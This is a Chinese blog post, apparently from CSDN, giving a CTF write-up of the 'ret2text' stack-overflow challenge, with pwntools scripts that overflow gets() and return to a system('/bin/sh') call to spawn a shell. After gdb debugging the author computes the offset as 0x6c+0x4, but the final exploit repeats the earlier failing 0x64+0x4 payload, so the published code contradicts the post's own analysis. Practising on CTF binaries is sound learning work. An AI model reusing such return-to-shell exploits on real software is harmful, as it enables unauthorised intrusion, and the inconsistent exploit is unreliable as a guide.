WIKI|PEN-ret2text-WP

最新推荐文章于 2023-04-20 00:39:38 发布
最新推荐文章于 2023-04-20 00:39:38 发布
阅读量2k 收藏 1
点赞数
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l2645470582_/article/details/122457108
版权

1.检查保护机制

(1)开启堆栈不可执行保护

(2)该文件是32位文件

2.用32位IDA打开该文件

(1)先运行试试看

 

(2)shift+f12查看关键字符串

我们看到有system("/bin/sh")关键字符串

(3)进入main函数看看 

 

看到gets()函数我们就看到溢出点了。S:0x64

 

 我们构造payload

#encoding = utf-8
from pwn import*

context(os = 'linux',arch = 'i386',log_level = 'debug')
content = 1

def main():
	if content == 1:
		p = process('ret2text')
		
	binsh_addr = 0x0804863A
	payload = b'a' *(0x64+0x4) + p32(binsh_addr)
	p.recvuntil("There is something amazing here, do you know anything?\n")
	p.sendline(payload)
	
	p.interactive()
main()

我们发现没有拿到shell权限

(4)我们gdb调试查找s的位置,计算偏移

 

 找到s跳转位置0x080486AE

gdb调试给call下断点

 然后运行

 s位置在0xffffd0ec

s相对于ebp的偏移量为:ebp-s=0xffffd158-0xffffd0ec=0x6c

s相对于返回地址的偏移量为:0x6c+0x4

3.EXP

#encoding = utf-8
from pwn import*

context(os = 'linux',arch = 'i386',log_level = 'debug')
content = 1

def main():
	if content == 1:
		p = process('ret2text')
		
	binsh_addr = 0x0804863A
	payload = b'a' *(0x64+0x4) + p32(binsh_addr)
	p.recvuntil("There is something amazing here, do you know anything?\n")
	p.sendline(payload)
	
	p.interactive()
main()

L__y
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
跟着CTF-wiki学pwn——ret2text
qq_42882717的博客
06-21 1059
肾么叫做万死不辞呀,就是每天被气死一万次,也不辞职…(哭哭
ret2text知识点及例题
weixin_44864859的博客
05-19 1372
ret2text 这里涉及到的知识 Stack: No canary found NX: NX enabled ret2text: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked 1.首先是stack保护措施,如果开启的话在栈中返回地址前放一个随机值,如果被覆盖,程序就会报错退出 2.nx则是 no execution,如果开启的话就不能让ip寄存器指向堆和栈。。。。注意堆和栈是不
【PWN · ret2text】[BJDCTF 2020]babystack
Mr_Fmnwon的博客
04-20 774
作为pwn新手,尽可能在刷题中,记录、学习一些通用的知识点,因此wp是少不了的。本题是一道简单的ret2text
ctf pwn 萌新学习记录 基本rop(题目来自Wiki
weixin_73481933的博客
01-04 1301
此后又发现在 secure 函数又发现了存在调用system(“/bin/sh”) 的代码,那么如果我们直接控制程序返回至 0x0804863A,那么就可以得到系统的 shell 了。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets),这就是我们所要说的 ROP。下面就是我们如何构造 payload 了,首先需要确定的是我们能够控制的内存的起始地址距离 main 函数的返回地址的字节数。发现错了(原因:IDE可能会把栈的长度测量错了)
pwn基础之ctfwiki-栈溢出-基本ROP-ret2text
qq_52658640的博客
04-21 992
文章目录前言原理ret2text发现漏洞利用漏洞书写exp总结 前言 刚开始自己的二进制生涯,想记录一下自己的学习,如有错误还请大佬们斧正。 原理 ret2text 即控制程序执行程序本身已有的的代码 (.text)。其实,这种攻击方法是一种笼统的描述。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets),这就是我们所要说的 ROP。 这时,我们需要知道对应返回的代码的位置。当然程序也可能会开启某些保护,我们需要想办法去绕过这些保护。 ret2tex
PWN初体验之ret2text
weixin_43137410的博客
08-04 666
"Hello,World!"的浪漫可能只有直男才懂!
ret2text涉及到的堆栈平衡问题-附件资源
03-05
ret2text涉及到的堆栈平衡问题-附件资源
0001-TIPS-2020-hxp-kernel-rop : ret2user
06-19
0001-TIPS-2020-hxp-kernel-rop : ret2user
cust-ret
03-18
关于Laravel Laravel是一个具有表达力,优雅语法的Web应用程序框架。 我们认为,发展必须是一种令人愉快的,富有创造力的经历,才能真正实现。 Laravel减轻了许多Web项目中使用的常见任务,从而减轻了开发过程中的...
单片机测试2-(1).docx
12-14
2. 单片机最小工作系统包括电源电路、复位电路和时钟电路,而不包括键盘电路。 3. 当EA引脚接低电平时,单片机只执行片外程序存储器中的程序。 4. 外部中断0的入口地址是0003H。 5. 在汇编语言语句格式中,操作码...
ctf-wiki 基本ROP
农夫果园好好喝的博客
07-11 457
ret2text 原理:ret2text 即控制程序执行程序本身已有的的代码 (.text)。其实,这种攻击方法是一种笼统的描述。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets),这就是我们所要说的 ROP。 这时,我们需要知道对应返回的代码的位置。当然程序也可能会开启某些保护,我们需要想办法去绕过这些保护。 流程...
[PWN] CTF-WIKI ret2text
qq_46441427的博客
02-06 431
ret2text 首先我们打开题目,checksec一下,主要是查看一下该程序是多少位的,并了解其保护机制 32位的小端位程序,没有开启canary堆栈保护及NX,于是我们用32位ida打开 我们打开ida-32,看到源码,发现了一个get函数,这属于我们常说的危险函数 在函数框,我们找到了一个secure函数,调出来,发现有一个system("/bin/sh")函数 这个时候,我们只需要知道调用system函数的指令的地址,然后当get函数执行时我们把get函数的ret上准备ret的地址换成调用syst
入门到放弃系列 ret2text
weixin_43489686的博客
09-10 1471
ret2text 这道题目是一道入门级别的题目,主要还是熟悉堆栈原理和工具的使用,那么话不多说,开始看题。 做题的第一步,先看看这道题的基本逻辑,那把程序试运行一遍发现是简单的输入输出和很常规的嘲讽战术。既然有输入输出又是pwn题应该也是肯定有溢出漏洞的(强行推断)。 做题第二步,那再看看这个程序有没有什么保护措施,发现只开了一个堆栈不可执行的保护,总之就是这个程序相当不安全。同时还发现这个程序...
PWN Ret2text
weixin_42306891的博客
03-21 1716
题目:文件夹内; 工具:IDA,gdb,pwntools; 解题思路:关键在偏移量 ; 解题: 1,IDA大法secure函数 调用了system函数,我们要做的是以此拿到shell即可; Main还使用了gets,存在栈溢出风险,以此为突破; 现在分两种解法; 1,gets函数的地址: 下端点,进行一波操作; 信息如下: S相对...
PWN做题笔记1-ret2text(已校对)
qq_40923256的博客
04-19 3221
原题位置:CTFHub 题目属于栈溢出 给出了地址和端口,压缩包中有一个二进制程序pwn file pwn可以看到是64位ELF程序 checksec发现没有开启地址空间随机化机制 程序运行如下: ida64反汇编,发现输入没有边界检查,存在注入 secure函数调用了system返回一个服务器里的shell,因此目标是调用这个函数 函数地址如下: main函数栈结构如下: 目标是覆盖掉ebp,地址偏移为0x70+8,这部分覆盖为“A”,之后ebp覆...
BUUCTF|PWN-ciscn_2019_n_8-WP(格式化字符串漏洞)
l2645470582_的博客
01-11 2263
1.检查保护机制 (1)保护全开 2.运行看一下 3.我们用32位的IDA打开该文件 (1)Ctrl+F12查看关键字符串 (2)查看反编译代码 (3)条件满足var[13]!=0 &&var[13] ==17,才能拿到权限 (4)var[13]位置在第十四个上 payload构造 第一种: payload = b'a'*13*4 + p32(17) #qword/IDA在32位里面是4个字节,在64位是/8个字节 ...
BUUCTF|PWN-[OGeek2019]babyrop1-WP
l2645470582_的博客
01-12 2247
1.检查保护机制 (1)该文件是32位文件 (2)开启堆栈不可执行 2.用32位IDA打开该文件
PWN|工具下载
l2645470582_的博客
11-01 1091
1.Linux/Ubuntu下载pwntools sudo pip install -U pwntools 2.Linux/Ubuntu下载checksec git clone https://github.com/slimm609/checksec.sh 3.Linux/Ubuntu下载gdb调试工具 sudo apt-get update sudo apt-get install gdb 4.Linux/Ubuntu下载LibcSearcher ...
while (location == -1 || ret == -2)
最新发布
05-22
while (location == -1 || ret == -2) 是一个循环语句,其中 location 和 ret 都是变量。当 location 或 ret 的值等于 -1 或 -2 时,循环体会一直执行,直到 location 和 ret 的值都不为 -1 或 -2 时才停止循环。这种循环语句通常用于等待某个事件的发生,或者等待某个条件的满足。其中,-1 和 -2 可能代表不同的含义,具体需要根据上下文来理解。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值